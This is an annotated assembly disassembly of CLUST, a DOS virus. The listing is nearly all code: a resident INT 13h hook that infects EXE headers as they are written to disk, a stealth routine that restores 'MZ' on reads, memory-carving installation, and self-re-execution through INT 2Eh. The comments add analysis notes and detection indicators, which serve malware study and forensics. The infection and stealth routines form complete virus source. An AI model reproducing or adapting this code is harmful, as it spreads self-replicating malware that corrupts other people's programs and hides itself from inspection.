; CLUST
;--------------------------------------------------------------------------
; Disassembled by FairWind / NRG , [email protected]
;--------------------------------------------------------------------------
; 16-bit DOS .COM image (tiny model, code at offset 100h).
; The 115h bytes starting at OldInt13 are the block that the routines below
; copy to the top of memory and into disk write buffers.
.model tiny
.code
org 100h
start:
; Short jump from 100h to EntryPoint (180h) = bytes EB 7E. Read as a word
; that is 7EEBh, the same value the INT 13h handler tests for and writes as
; its "already modified" marker.
jmp short EntryPoint
; 122 bytes of NOP padding: 100h + 2 + 122 puts OldInt13 at 17Ch and
; EntryPoint at 180h.
LotsaNOPs db 122 dup (90h)
; Far pointer (offset, segment) of the previous INT 13h handler; filled in
; by InstallVirus and used by the handler to chain.
OldInt13 dd 0
EntryPoint:
; Hand-encoded E9 7C 00: near JMP with displacement +7Ch from the next
; instruction. By byte count of this listing the target is InstallVirus
; (assumes default instruction encodings - verify against the binary).
db 0e9h,7ch,0
;--------------------------------------------------------------------------
; Int13Handler - resident hook on INT 13h (BIOS disk services).
; In:    AH = BIOS disk function; ES:BX = sector buffer for AH=2 / AH=3
; Flow:  AH=3 (write) -> IsDiskWrite
;        AH=2 (read)  -> call the previous handler, then post-process buffer
;        other        -> chain to the previous handler unchanged
; Read path (stealth): if the buffer just read starts with the marker word
; 7EEBh, the first word is changed back to 5A4Dh ('MZ') and 115h bytes at
; buffer+80h are zeroed, so anything reading through INT 13h while the hook
; is resident sees an unmodified-looking EXE header.
; Analysis note: on-disk content must be examined from a clean boot; reads
; made on the running system pass through this filter.
;--------------------------------------------------------------------------
Int13Handler:
cmp ah,3                          ; write sectors?
je IsDiskWrite
cmp ah,2                          ; read sectors?
jne GoInt13                       ; neither: not of interest, chain
pushf                             ; PUSHF + far CALL emulates INT for the old handler
call cs:OldInt13                  ; perform the real read first
jc Exit13Handler                  ; read failed: leave buffer alone
cmp word ptr es:[bx],7EEBh        ; buffer starts with EB 7E marker?
jne Exit13Handler
mov word ptr es:[bx],5A4Dh        ; present 'MZ' to the reader instead
push di cx ax
mov cx,115h                       ; length of the copied block
xor ax,ax                         ; fill byte = 0
db 89h,0dfh                       ; = mov di,bx (alternate encoding kept byte-exact)
add di,80h                        ; ES:DI = buffer + 80h
rep stosb                         ; blank the block; no CLD here, relies on DF=0
pop ax cx di
Exit13Handler:
; IRET reloads the FLAGS pushed by the caller's INT 13h, so the caller does
; not receive the carry flag produced by the chained call above.
iret
GoInt13:
jmp cs:[OldInt13]                 ; tail-jump to the previous handler
;--------------------------------------------------------------------------
; IsDiskWrite - INT 13h AH=3 path; alters the caller's buffer before the
; write is passed on to the previous handler.
; In:    ES:BX = buffer about to be written
; Conditions checked, in order (any failure -> chain unchanged):
;   1. first word is 5A4Dh ('MZ')
;   2. word at buffer+4 is below 75h (unsigned). In an MZ header this field
;      is the file length in 512-byte pages - presumably a size limit;
;      the listing does not state the reason.
;   3. the scan of 115h bytes at buffer+80h runs its counter down to zero
; If all hold: the 115h bytes at CS:OldInt13 are copied to buffer+80h and
; the first word is replaced with 7EEBh.
; Detection artefacts visible from this code: sector data beginning EB 7E
; with a non-zero 115h-byte region at offset 80h.
; All registers pushed here are restored before chaining.
;--------------------------------------------------------------------------
IsDiskWrite:
cmp word ptr es:[bx],5A4Dh        ; 'MZ' at start of buffer?
jne GoInt13
cmp word ptr es:[bx+4],75h        ; header word at +4 must be < 75h
jae GoInt13
push ax cx si di ds
push es
pop ds                            ; DS = buffer segment for LODSB
db 89h,0deh                       ; = mov si,bx (alternate encoding kept byte-exact)
add si,80h                        ; DS:SI = buffer + 80h
mov cx,115h
AllZeros:
lodsb
cmp al,0
loopz AllZeros                    ; continue while byte == 0 and CX != 0
cmp cx,0
jne ExitInfectHandler             ; stopped early on a non-zero byte: region in use
db 89h,0dfh                       ; = mov di,bx
add di,80h                        ; ES:DI = buffer + 80h (destination)
mov cx,115h
mov si,offset OldInt13            ; source = resident block, starting at OldInt13
push cs
pop ds
rep movsb                         ; copy block into the outgoing buffer
db 89h,0dfh                       ; = mov di,bx (back to buffer start)
mov ax,7EEBh                      ; bytes EB 7E
stosw                             ; overwrite the 'MZ' signature with the marker
ExitInfectHandler:
pop ds di si cx ax
jmp short GoInt13                 ; let the (possibly modified) write proceed
;--------------------------------------------------------------------------
; InstallVirus - one-time installation, reached from EntryPoint.
; Steps visible in the code:
;   1. save the current INT 13h vector in OldInt13
;   2. require that this program's memory control block (MCB) is the last
;      in the chain (type 'Z'); otherwise exit without installing
;   3. lower both the MCB size and the PSP top-of-memory word by 39h
;      paragraphs (390h bytes), carving a region at the top of memory
;   4. copy 115h bytes from CS:OldInt13 to the same offset in that region
;   5. point INT 13h at Int13Handler inside the copy
;   6. resize this program's own block to 39h paragraphs
; Indicators for memory forensics: INT 13h vector pointing just below the
; top of conventional memory, and reported memory 39h paragraphs short.
;--------------------------------------------------------------------------
InstallVirus:
mov ax,3513h                      ; DOS: get INT 13h vector -> ES:BX
int 21h
mov word ptr cs:[OldInt13],bx     ; keep it for chaining
mov word ptr cs:[OldInt13+2],es
mov ah,0Dh                        ; DOS: disk reset (flush buffers)
int 21h
mov ah,36h                        ; DOS: get free space, DL=0 -> default drive
mov dl,0
int 21h                           ; returned values are not read afterwards
mov ax,cs
dec ax
mov ds,ax                         ; DS = CS-1 = MCB of this program's block
cmp byte ptr ds:0,'Z'             ; MCB type 'Z' = last block in chain
jne Terminate                     ; not last: do not install
; sub word ptr ds:[3],39h  - MCB size field (paragraphs); hand-encoded
db 81h,2eh,03,0,39h,0
; sub word ptr ds:[12h],39h - MCB:12h is PSP:02h, the top-of-memory segment
db 81h,2eh,12h,0,39h,0
mov si,offset OldInt13
db 89h,0f7h                       ; = mov di,si (same offset in destination)
mov es,ds:[12h] ;ES = new segment (the lowered top-of-memory value)
push cs
pop ds
mov cx,115h
rep movsb                         ; CS:OldInt13.. -> ES:OldInt13.., 115h bytes
mov ax,2513h                      ; DOS: set INT 13h vector to DS:DX
push es
pop ds                            ; DS = segment of the resident copy
mov dx,offset Int13Handler
int 21h
mov ah,4Ah                        ; DOS: resize memory block ES to BX paragraphs
push cs
pop es
mov bx,39h
int 21h
;--------------------------------------------------------------------------
; After installation: locate this program's own path in the DOS environment
; block, copy it to Filename as a CR-terminated string, and hand it to the
; command interpreter through INT 2Eh so the program is started again with
; the INT 13h hook now resident. Then terminate.
; PSP:2Ch holds the environment segment. In DOS 3.0+ the environment ends
; with a zero word, followed by a count word and the program's full path.
;--------------------------------------------------------------------------
push cs
pop ds
mov bx,ds:[2ch]                   ; BX = environment segment from the PSP
mov es,bx
xor ax,ax                         ; search value = 0000h
mov di,1
ScanForFilename:
dec di                            ; DEC DI + SCASW (+2) = advance one byte per pass
scasw                             ; zero word at ES:DI?
jnz ScanForFilename
lea si,[di+2]                     ; skip the word after the terminator -> path
push bx
pop ds                            ; DS = environment segment (source)
push cs
pop es                            ; ES = this segment (destination)
mov di,offset Filename
push di                           ; remembered for SI below
xor bx,bx                         ; BX counts bytes stored
CopyFilename:
mov cx,50h                        ; reloaded on every pass, so it never reaches 0
inc bx
lodsb
cmp al,0
jne StoreFilename
mov al,0Dh                        ; replace the terminating NUL with CR
StoreFilename:
stosb                             ; writes run past the 1-byte Filename label
cmp al,0Dh
loopnz CopyFilename               ; effectively: repeat until CR was stored
; 28Fh is a hard-coded offset; by byte count it is the byte just before
; Filename. DS still holds the environment segment at this point.
mov byte ptr ds:[28fh],bl
push cs
pop ds
pop si
dec si                            ; SI = offset Filename - 1
int 2Eh                           ; COMMAND.COM execute: DS:SI = counted command string
Terminate:
mov ah,4Ch                        ; DOS: terminate process
int 21h
; Byte immediately before Filename; INT 2Eh is entered with SI pointing here.
db 0
; Start of the buffer CopyFilename writes the program path into. Only one
; byte is reserved in the image; the copy extends past the end of the file.
Filename db 1
end start